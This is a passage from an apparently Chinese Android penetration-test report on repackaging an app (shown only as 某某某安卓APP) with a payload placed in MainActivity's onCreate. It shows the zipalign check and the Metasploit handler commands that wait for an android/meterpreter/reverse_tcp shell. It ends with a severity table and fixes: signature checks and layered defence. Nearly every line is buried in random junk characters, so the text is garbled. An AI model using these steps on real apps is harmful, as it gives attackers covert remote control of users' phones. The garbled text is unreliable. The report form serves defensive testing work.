. q3 L: S9 E2 Z& p" B% o, L $ J) y& z+ g2 x* u* H* L3 b 检查是否对齐 ' [, Y3 H- y5 j z ' T2 J# L a8 X) z. @! ~

6 Z! b1 U' c/ ?: Q3 O7 b % w1 g# l. X; r2 [( y0 x* M zipalign -c -v 4 final.apk : s5 ?+ u- S, ~0 M& A ; T. L% E3 A3 @/ m! e

' C) G" D2 a; l9 T6 t3 V1 y. ?+ u4 o 注：zipalign可以在V1签名后执行，但zipalign不能在V2签名后执行,只能在V2签名之前执行 # m3 v" j3 H7 L: g% `: s3 p, ]- Q' |

+ O) S' y# B0 c" _& M8 b: i: i 1 q( h: k, X$ E0 k* A) f: { 启动Metasploit控制台，配置参数等待上线 8 u* p5 T* }2 {/ R& S' d( C* B T/ t6 k0 S/ U+ N' B- c6 V

* C8 ^) v2 j1 |$ B; Y' y$ y' y 3 u, A% Z+ y% {9 U Q( k 在终端依次输入如下命令 ' U5 p$ F+ ?8 u" P1 B p4 i) E$ T5 E4 \; G6 A L3 \# k6 _

" c3 l. p. w7 n" E7 Z& m7 N 2 {0 ]! Z0 A. [. M/ c$ T# y msfconsole # ~8 @7 K4 ?4 Y& \7 x0 t- p , o0 Y( M1 G4 J5 d1 R

2 j6 t7 G9 ~7 l3 `$ x" j5 I: y6 |2 W, I, { use exploit/multi/handler % c- q* e! t' ?. ] ( Q* k7 W" X1 E7 X: _

5 R b& W0 F) V' T- x4 Y. j % J- n; l) g' d- u5 ?& q set PAYLOAD android/meterpreter/reverse_tcp 5 k( p/ O; j; J , S8 t# \" `* h3 z/ ~6 p1 G: i

9 d7 b+ V+ a, ]2 R : I4 a( j% W& _+ ? set LHOST 192.xxx.xx.xx " ~9 |) s: H& y8 l# @, F3 L0 h J4 u+ U/ ~4 B, J( r+ a/ V

, ]$ ~9 E4 W2 n! ]& P . w4 X0 b+ o( P& K ]# G set LPORT 4444 ) @) r6 p: Q2 q* F# d0 g$ e' q9 |' t7 B0 L! o: ]' M5 W

7 c) g5 j* u$ z' I: q' e! e% u* a( L* l. x exploit 0 S! }7 R) |* Z! A2 Y- L/ Q( t" j( d" i5 M, C) J

& P7 V" p- D, K ' E) g# h& c* x1 ]1 L% B 之前我们把入口放在 MainActivity 的 onCreate 方法中，当启动目标应用进入该界面，就会连接成功，如下图： ! K [) y- u; q 9 u2 F- L) _4 }

# S+ l2 l/ Q t' Z" D) s$ _6 H ( [ D1 q7 i# q+ H 漏洞危害：中 # k! {- k0 w& [: h/ y1 I / U, d" ?* b; _7 N) G) l

" t& r2 B8 Q& j! M A" n( z# b8 x1 u0 p- E6 J ) K0 Q: U) L$ l; x1 c3 W5 D3 Q$ u& G9 D & e H4 M3 x% z F" V, E, \' m% Y 严重程度 4 A$ C/ x1 D! O+ H& V! B' G0 g* D1 G2 p0 F4 b! n , c5 B3 T' q$ O$ j! ^' Y , \|! z2 q$ G0 Y( H	9 @- P4 {0 [' J& N4 f; r, [( M4 H d9 S2 @ + g! L) u+ t8 r4 s+ O: @ " ]3 ? L. m) H 高 $ y+ \|" W+ L9 C; _5 L/ w3 j" t$ K. B, I; \. k' @# X) R. B6 o2 e 9 O: O9 Y7 u5 e1 @4 s* {3 s; l & A, E* g( B) m& m& L+ X4 F$ @& x	; W5 l1 l& }8 N9 ~2 F/ w ' e- N4 {+ X2 e$ Z 6 R; I; D: e9 Z5 T- u) L, g @$ I " m; b2 T; v2 \|% Z+ [- I ■ , S- D8 [8 [% P' ^ { " z+ k, J' H0 T7 v" V% c* G9 ^9 V7 o ) A6 z9 I: w! a/ E2 R$ W3 B- B 5 }! T$ ^( Q7 O$ x. o5 n: A( H	5 G& k6 o' }: r; c . R) c0 ?+ @* B. b+ e8 \|/ K' g- y * A7 o0 y, c; d4 `0 a W! P0 I9 \, d% Y" R( F4 K& @. k8 Y 中 7 W" N7 v1 ]0 z9 D0 Q, r) A# d/ I: d4 s# d ; \|2 p. d8 b0 U; z, n/ E2 ~5 _# m: S) c	1 l: Q* W% o$ Z2 W& d6 X ' K% G# @4 \| A. B+ t- r. u $ `% _# h; \" ?( J& G. U) [; }9 a6 w! e 4 ?$ }4 X" g8 M $ k4 i* \8 o$ z, d2 g* j+ a) j ! O1 ~! X6 J. ?' Z # f9 B5 v) T }4 \|: l " p6 x6 p% S; a! g/ i& \ w. r3 x5 v) d( `! F- k	5 B1 u( R, k. a8 ~) B & `9 w8 v l" Q + y$ X! c0 N- o0 t( j1 H8 Z6 j. E2 M+ h; _6 l/ T, y 低 3 \|- { G2 @& d7 }! e. ?" i9 F / c# {' e) Q2 i / S* E- p; K Z- u1 m* u1 [( L ( O) p3 f) [% ?	% G: J7 v. P$ n! C+ B& \|1 y- @ 5 i7 G4 Z$ n7 R# m7 p0 ` a+ N$ z9 I7 m4 p. `3 @% ?3 u 9 p6 O0 d0 t; S0 p- D# q' q* z ; d% D0 P" c8 l) g& i9 n* K 7 p, h- j6 ?( d2 P+ d% U7 [$ j " m3 W: u% r3 J) D# @ * A3 Z& k! y$ ]6 C8 T4 f5 d* B w + Q9 W6 [# O6 B2 }. [6 E. f- E9 Q& ^7 p$ U% r7 b

Q. T6 Q0 E4 r# G , c$ h" Z: K; u3 @& Y1 t 1 N/ ?7 B; N+ f+ O, H ; Q8 A' }: C( l

- c; G. F9 G" ? t) _" R2 x& Q% r9 x5 g9 m7 f0 U 修复方法： " c P3 _( z2 c: E2 P; s 4 L! C3 x, Y5 N$ i* S; T2 H# K J

& x7 J5 Q. L9 Q a- b* _, @- b0 h 1.在 APP 启动时应做签名校验防止二次打包。
. D! q1 h B- m9 @4 z3 D; g @ 1 y7 a% P: a3 l& z6 D+ n 2.建议采用客户端、通信和服务器端联动防御方案进行安全防御。 " U0 U- Y& K# I+ B$ v2 K 1 _" b+ Z/ N& Z4 O s

( c: b# ]' p# B* V k6 t& m- q) e+ M3 T: h( H' o 0 W* E' Y0 F* Q4 ~! I! h1 s- F. s2 ^2 Q1 U% p

1 I. K+ o+ c4 `2 U / h" k3 X4 P5 h" U
& v. {4 ~1 O+ h0 P- i * G& X: s' F* ~3 }1 u4 ^/ \

" Y# G3 D0 C( u; y ! e- ]; B1 a, p & ?2 P- r6 p' t4 {& O ! j: }9 ?2 F7 r3 G# n 序号 + y7 P8 Y/ ^" d+ N% M0 L \1 N9 D. s" k" b+ z+ l & p" t6 r; B B4 a# e( u0 \|/ {% M. p& C8 X& Z) m; \|- R	% s5 W6 l$ U! f 7 z0 H: J$ L2 ]) G" J, S4 h7 Y2 i 6 r- b9 D: m G3 g) h( _# k3 h8 e& t0 x8 z/ G5 C- m9 S2 t5 g2 T 测试对象 : ?; U ? {& A" h: v1 z " `! H! G, h# ~! q. d! _8 A: M + t, ~! T* q9 Q3 k: m ? ]- }2 N$ y" j	8 Q1 x# [% R/ j $ y1 Y6 j; F# E2 z & b3 x; @2 q& x" S8 R# p& z1 h . u- A- c3 y7 e% q 测试地址 & d, U* Q9 K: J6 m# A: ?& H+ N , g$ O. k! `/ { } . x+ X/ Z# L3 K' ]9 o 4 X/ j# J/ `% b5 h5 L, ?	. R/ f Z) f+ P2 Y- q' o: } N7 Y e 1 ?5 t! V3 v9 G$ T1 o \1 P6 h, h9 V3 ~1 ?/ i J& f" { 安全漏洞 ' j9 g' H7 {7 Y2 \|9 M" w 9 z( ?' \|8 @/ V" s& V) y& o ! c. [5 x9 f% j 1 e% P1 [5 T% @# e4 O
2 t9 f6 K m) Y. i $ ^+ l J7 S5 ]$ [) t5 G * `$ g# c# T# A$ o3 Q* i 2 f1 C8 h: {6 d! n9 y/ o 1 / W( d7 {$ j7 Z" H# f / Z+ m- P% Z& h% k- i7 ^5 e 5 G$ M3 N* f* r9 U- g) o* Q9 V# E6 o0 E* @2 A5 P' \) T- [! ~	" q) w# \5 C3 { 8 f# l4 z" K7 M" }1 y 0 v& o; o3 N+ P. w+ \|" w ; v# z7 v! f; k1 K, @" ?- R. n 某某某安卓APP " c" u7 @! o, c( g6 m( a1 b/ M \|$ M, e; m* z6 d / N+ Y$ l- ?6 v$ D* e3 I	& K5 x: d5 Z2 }4 D. d - R8 V, w6 _( E1 }- E ^1 ? % k5 W( O( [$ g" {' p: a ! r, f; z' U! ?' J; P8 d A, O ( z5 V/ k& ?9 j# O2 @- J5 D , d1 h8 q* N' i# V$ P/ n; V $ n E4 Q" u2 E0 A 0 \|; z1 F3 i4 z; y6 y	' ]" t/ k+ u* s, ?1 A 2 I! ?6 R, Z6 W * \|/ }3 y/ `1 x* b4 Z/ {+ E) t9 M& J4 M) ~ 2 # ]3 k: ?; q! B! n! a% [, o4 ]3 h0 D0 W; q% T , Q) K4 p3 L% _! W3 f V* o2 G2 }/ \|* ^

中国网络渗透测试联盟